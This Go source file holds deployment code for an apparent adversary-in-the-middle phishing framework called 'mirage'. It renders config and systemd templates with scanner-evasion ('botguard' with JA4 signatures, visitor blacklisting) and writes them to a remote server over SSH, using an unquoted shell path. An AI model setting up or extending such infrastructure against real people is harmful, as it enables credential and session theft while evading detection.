package deploy

import (
	"bytes"
	"fmt"
	"text/template"

	"golang.org/x/crypto/ssh"
)

const configTemplate = `# Auto-generated by mirage deploy — do not edit by hand.
# Re-run 'mirage deploy' to update.

domain: {{ .Domain }}
external_ipv4: {{ .ExternalIPv4 }}
bind_ipv4: {{ .BindIPv4 }}
https_port: {{ .HTTPSPort }}
dns_port: {{ .DNSPort }}
autocert: {{ .AutoCert }}

api:
  secret_hostname: {{ .SecretHostname }}
  client_ca_cert: {{ .RemoteConfigDir }}/client-ca.crt

blacklist:
  mode: unauth
  file: {{ .RemoteConfigDir }}/blacklist.txt

botguard:
  enabled: true
  ja4_db: {{ .RemoteConfigDir }}/ja4signatures.json
  spoof_url: ""
`

const systemdUnitTemplate = `[Unit]
Description=Mirage AiTM phishing framework daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart={{ .RemoteBinaryPath }} --config {{ .RemoteConfigDir }}/miraged.yaml
ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=5s
LimitNOFILE=65536
NoNewPrivileges=true
ProtectSystem=strict
ReadWritePaths={{ .RemoteConfigDir }}
AmbientCapabilities=CAP_NET_BIND_SERVICE

[Install]
WantedBy=multi-user.target
`

// render parses and executes a template string against cfg.
func render(name, tmplStr string, cfg DeployConfig) (string, error) {
	tmpl, err := template.New(name).Parse(tmplStr)
	if err != nil {
		return "", fmt.Errorf("parsing template %q: %w", name, err)
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, cfg); err != nil {
		return "", fmt.Errorf("rendering template %q: %w", name, err)
	}
	return buf.String(), nil
}

// renderConfig renders the miraged.yaml config template with the given values.
func renderConfig(cfg DeployConfig) (string, error) {
	return render("config", configTemplate, cfg)
}

// renderSystemdUnit renders the systemd unit file content with the given values.
func renderSystemdUnit(cfg DeployConfig) (string, error) {
	return render("unit", systemdUnitTemplate, cfg)
}

// writeRemoteFile writes content to path on the remote host via SSH heredoc.
func writeRemoteFile(client *ssh.Client, path, content string) error {
	cmd := fmt.Sprintf("cat > %s << 'MIRAGE_EOF'\n%sMIRAGE_EOF", path, content)
	_, err := runCmd(client, cmd)
	return err
}

// writeConfig renders the config template and writes it to the remote host.
func writeConfig(client *ssh.Client, cfg DeployConfig) error {
	content, err := renderConfig(cfg)
	if err != nil {
		return err
	}
	return writeRemoteFile(client, cfg.RemoteConfigDir+"/miraged.yaml", content)
}

// writeSystemdUnit writes the systemd unit file to /etc/systemd/system/miraged.service.
func writeSystemdUnit(client *ssh.Client, cfg DeployConfig) error {
	content, err := renderSystemdUnit(cfg)
	if err != nil {
		return err
	}
	return writeRemoteFile(client, "/etc/systemd/system/miraged.service", content)
}
